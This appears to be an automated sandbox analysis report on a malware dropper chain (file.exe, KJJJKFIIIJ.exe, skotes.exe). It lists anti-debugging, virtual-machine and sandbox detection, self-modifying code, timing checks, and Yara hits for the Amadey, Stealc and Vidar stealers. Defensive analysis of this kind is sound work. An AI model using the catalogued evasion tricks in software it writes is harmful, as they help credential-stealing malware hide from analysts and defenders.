Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B92C01 second address: 9BED6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 2097CC02h 0x00000010 pushad 0x00000011 je 00007FF0EC6B64CBh 0x00000017 and di, 2600h 0x0000001c mov ax, cx 0x0000001f popad 0x00000020 push dword ptr [ebp+122D06B9h] 0x00000026 jmp 00007FF0EC6B64D4h 0x0000002b call dword ptr [ebp+122D207Ch] 0x00000031 pushad 0x00000032 jmp 00007FF0EC6B64D4h 0x00000037 xor eax, eax 0x00000039 jmp 00007FF0EC6B64D6h 0x0000003e mov edx, dword ptr [esp+28h] 0x00000042 clc 0x00000043 mov dword ptr [ebp+122D3B62h], eax 0x00000049 cld 0x0000004a mov esi, 0000003Ch 0x0000004f mov dword ptr [ebp+122D2050h], edx 0x00000055 add esi, dword ptr [esp+24h] 0x00000059 mov dword ptr [ebp+122D2050h], ebx 0x0000005f cld 0x00000060 lodsw 0x00000062 mov dword ptr [ebp+122D2FAFh], edx 0x00000068 add eax, dword ptr [esp+24h] 0x0000006c mov dword ptr [ebp+122D2FAFh], eax 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 pushad 0x00000077 mov dword ptr [ebp+122D2FAFh], esi 0x0000007d popad 0x0000007e or dword ptr [ebp+122D2050h], ecx 0x00000084 nop 0x00000085 jns 00007FF0EC6B64D0h 0x0000008b push eax 0x0000008c push eax 0x0000008d push edx 0x0000008e push edx 0x0000008f pushad 0x00000090 popad 0x00000091 pop edx 0x00000092 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B93ED0 second address: B93EDD instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF0EC517C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B7DAA5 second address: B7DAAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B7EB46 second address: B7EB4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B81B26 second address: B81B2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B81B2A second address: B81B38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FF0EC517C7Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B81B38 second address: B81B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B984D9 second address: B984E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FF0EC517C76h 0x0000000a rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B984E3 second address: B984F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jo 00007FF0EC6B64DBh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B9860B second address: B9861B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jns 00007FF0EC517C76h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	RDTSC instruction interceptor: First address: B98882 second address: B98886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7A5376 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5ED592 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5EFE6E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7B35F2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 82EE49 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Special instruction interceptor: First address: 9BEDE0 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Special instruction interceptor: First address: 9BED17 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Special instruction interceptor: First address: B5E3FF instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Special instruction interceptor: First address: B6F87A instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Special instruction interceptor: First address: 9BECE0 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Special instruction interceptor: First address: BE9F39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: A7EDE0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: A7ED17 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: C1E3FF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: C2F87A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: A7ECE0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: CA9F39 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe

Code function: 16_2_04A206B3 rdtsc

16_2_04A206B3

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\file.exe TID: 7776	Thread sleep time: -48024s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7772	Thread sleep time: -50025s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7844	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7764	Thread sleep time: -58029s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7748	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7748	Thread sleep time: -86043s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7756	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7756	Thread sleep time: -74037s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7752	Thread sleep time: -56028s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6064	Thread sleep count: 53 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6064	Thread sleep time: -1590000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6064	Thread sleep time: -30000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB6EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

0_2_6CB6EBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: skotes.exe, skotes.exe, 00000014.00000002.2651951754.0000000000C02000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: CFBFCGID.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: CFBFCGID.0.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: CFBFCGID.0.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: CFBFCGID.0.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: CFBFCGID.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: CFBFCGID.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: CFBFCGID.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: CFBFCGID.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: CFBFCGID.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: CFBFCGID.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: CFBFCGID.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: CFBFCGID.0.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1975584108.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000014.00000002.2653686921.00000000012B9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000014.00000002.2653686921.000000000128A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CFBFCGID.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: CFBFCGID.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: CFBFCGID.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: CFBFCGID.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: CFBFCGID.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: CFBFCGID.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: CFBFCGID.0.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: file.exe, 00000000.00000002.1970779986.00000000003A1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: iMSHN6QKQEMUh;=a
Source: CFBFCGID.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: file.exe, 00000000.00000002.1970779986.00000000003A1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: MSHN6QKQEMU
Source: skotes.exe, 00000014.00000002.2653686921.000000000129E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yi
Source: CFBFCGID.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: CFBFCGID.0.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: CFBFCGID.0.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: file.exe, 00000000.00000002.1975584108.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: CFBFCGID.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: KJJJKFIIIJ.exe, 00000010.00000003.1975732936.0000000000906000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\P
Source: CFBFCGID.0.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: CFBFCGID.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: CFBFCGID.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: file.exe, 00000000.00000002.1971873574.0000000000781000.00000040.00000001.01000000.00000003.sdmp, KJJJKFIIIJ.exe, 00000010.00000002.2007017936.0000000000B42000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000011.00000002.2038364209.0000000000C02000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000012.00000002.2037916036.0000000000C02000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000014.00000002.2651951754.0000000000C02000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: CFBFCGID.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: CFBFCGID.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: CFBFCGID.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: CFBFCGID.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe

Code function: 16_2_04A206B3 rdtsc

16_2_04A206B3

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CC3AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CC3AC62

Contains functionality to read the PEB

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_0098652B mov eax, dword ptr fs:[00000030h]	16_2_0098652B
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_0098A302 mov eax, dword ptr fs:[00000030h]	16_2_0098A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A4A302 mov eax, dword ptr fs:[00000030h]	17_2_00A4A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A4652B mov eax, dword ptr fs:[00000030h]	17_2_00A4652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A4A302 mov eax, dword ptr fs:[00000030h]	18_2_00A4A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A4652B mov eax, dword ptr fs:[00000030h]	18_2_00A4652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A4A302 mov eax, dword ptr fs:[00000030h]	20_2_00A4A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A4652B mov eax, dword ptr fs:[00000030h]	20_2_00A4652B

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CC3AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CC3AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7688, type: MEMORYSTR

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\KJJJKFIIIJ.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\KJJJKFIIIJ.exe "C:\Users\user\Documents\KJJJKFIIIJ.exe"	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CC84760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6CC84760

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB61C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

0_2_6CB61C30

Source: file.exe, 00000000.00000002.1972169085.00000000007C7000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Program Manager
Source: KJJJKFIIIJ.exe, 00000010.00000002.2007325885.0000000000B83000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000011.00000002.2038651683.0000000000C43000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000012.00000002.2038172550.0000000000C43000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: cProgram Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CC3AE71 cpuid

0_2_6CC3AE71

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CC3A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CC3A8DC

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 20_2_00A165E0 LookupAccountNameA,

20_2_00A165E0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 20_2_00A52517 GetTimeZoneInformation,

20_2_00A52517

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB88390 NSS_GetVersion,

0_2_6CB88390

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 17.2.skotes.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.skotes.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.skotes.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.KJJJKFIIIJ.exe.950000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2037822618.0000000000A11000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2037351297.0000000000A11000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2651137174.0000000000A11000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2006010941.0000000000951000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1975584108.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1970779986.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7688, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7688, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

